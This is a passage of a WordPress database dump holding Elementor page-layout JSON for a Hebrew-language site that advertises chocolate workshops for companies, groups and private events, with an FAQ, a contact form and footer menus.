\\u05d4\\u05d9\\u05db\\u05d5\\u05dc\\u05ea \\u05e9\\u05dc \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1\\u05d4 \\u05d5\\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05ea \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05e9\\u05dc \\u05db\\u05dc \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e1\\u05d1\\u05d9\\u05d1 \\u05d0\\u05d5\\u05ea\\u05d4 \\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea. \\u05db\\u05d5\\u05dc\\u05dd \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3, \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d8\\u05d5\\u05d1\\u05d4, \\u05de\\u05e6\\u05d7\\u05d9\\u05e7\\u05d4 \\u05d5\\u05de\\u05d4\\u05e0\\u05d4. \\u05dc\\u05de\\u05e2\\u05e9\\u05d4, \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05d4\\u05d6\\u05d3\\u05de\\u05e0\\u05d5\\u05ea \\u05dc\\u05e8\\u05d0\\u05d5\\u05ea \\u05d0\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9, \\u05db\\u05d5\\u05dc\\u05dc \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd, \\u05d1\\u05e1\\u05d9\\u05d8\\u05d5\\u05d0\\u05e6\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e0\\u05d5\\u05ea \\u05d5\\u05d0\\u05d9\\u05e9\\u05d9\\u05d5\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8, \\u05e9\\u05d4\\u05dd \\u05dc\\u05d0 \\u05de\\u05e7\\u05d5\\u05dd \\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d5\\u05d6\\u05d5 \\u05d1\\u05e2\\u05d9\\u05e7\\u05e8 \\u05e1\\u05d3\\u05e0\\u05d4 \\u05e9\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05ea\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d2\\u05d9\\u05dc\\u05d0\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e0\\u05e9\\u05d9\\u05dd \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3, \\u05d4\\u05e8\\u05d9 \\u05de\\u05d9 \\u05dc\\u05d0 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05dc\\u05d4\\u05ea\\u05e4\\u05e0\\u05e7 \\u05e2\\u05dc \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd?<\\/p><p>\\u00a0<\\/p><h3>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05d5\\u05d1\\u05d9\\u05ea\\u05d9\\u05ea<\\/h3><p>\\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05d1\\u05d9\\u05ea\\u05d9, \\u05db\\u05dc\\u05d5\\u05de\\u05e8 \\u05dc\\u05d4\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d0\\u05dc\\u05d9\\u05db\\u05dd, \\u05d5\\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d1\\u05d9\\u05ea, \\u05d1\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d0\\u05d9\\u05e0\\u05d8\\u05d9\\u05de\\u05d9\\u05ea \\u05d5\\u05d8\\u05d5\\u05d1\\u05d4, \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4. \\u05d0\\u05d9\\u05df \\u05d1\\u05e2\\u05d9\\u05d4 \\u05dc\\u05e2\\u05e8\\u05d5\\u05da \\u05d2\\u05dd \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e9\\u05e8\\u05d4 \\u05dc\\u05d8\\u05d5\\u05d1\\u05ea \\u05e9\\u05d5\\u05de\\u05e8\\u05d9 \\u05db\\u05e9\\u05e8\\u05d5\\u05ea \\u05d5\\u05d4\\u05de\\u05e1\\u05d5\\u05e8\\u05ea \\u05d0\\u05e6\\u05dc\\u05db\\u05dd \\u05d1\\u05e2\\u05e1\\u05e7, \\u05db\\u05da \\u05e9\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d8\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05db\\u05d5\\u05dc\\u05dd, \\u05d1\\u05dc\\u05d9 \\u05d9\\u05d5\\u05e6\\u05d0 \\u05de\\u05df \\u05d4\\u05db\\u05dc\\u05dc, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d1\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea. \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05db\\u05d5\\u05dc\\u05d4 \\u05e0\\u05e2\\u05e9\\u05d9\\u05ea \\u05ea\\u05d7\\u05ea \\u05db\\u05e9\\u05e8\\u05d5\\u05ea \\u05d7\\u05dc\\u05d1\\u05d9\\u05ea \\u05d0\\u05d5 \\u05e4\\u05e8\\u05d5\\u05d5\\u05d4 \\u05dc\\u05d1\\u05d7\\u05d9\\u05e8\\u05ea\\u05db\\u05dd, \\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d9\\u05dd \\u05d1\\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05e2\\u05d5\\u05d1\\u05e8\\u05d9\\u05dd \\u05d0\\u05d9\\u05e9\\u05d5\\u05e8 \\u05e8\\u05d1\\u05e0\\u05d5\\u05ea, \\u05d4\\u05e7\\u05de\\u05d7\\u05d9\\u05dd \\u05de\\u05e0\\u05d5\\u05e4\\u05d9\\u05dd, \\u05d5\\u05d0\\u05d9\\u05df \\u05e1\\u05db\\u05e0\\u05d4 \\u05e9\\u05dc \\u05de\\u05d0\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e9\\u05e8\\u05d9\\u05d9\\u05dd \\u05e9\\u05d9\\u05d1\\u05d5\\u05d0\\u05d5 \\u05d1\\u05de\\u05d2\\u05e2 \\u05e2\\u05dd \\u05d4\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05d4\\u05dd \\u05d0\\u05ea\\u05dd \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb4ead6\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"42838e7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcc3506\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ea9b142\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"43481a2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0b33674\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(430,103,'_wp_page_template','elementor_canvas'),(431,103,'_elementor_edit_mode','builder'),(432,103,'_elementor_data','[{\"id\":\"5841dc66\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"4504fb06\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"b815b78\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"76b85204\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"4855771b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"23c8927c\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd \\u05d5\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f5a1a2b\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7dc8b868\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"679b4d51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"79e92b2c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"1755930a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f43216a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 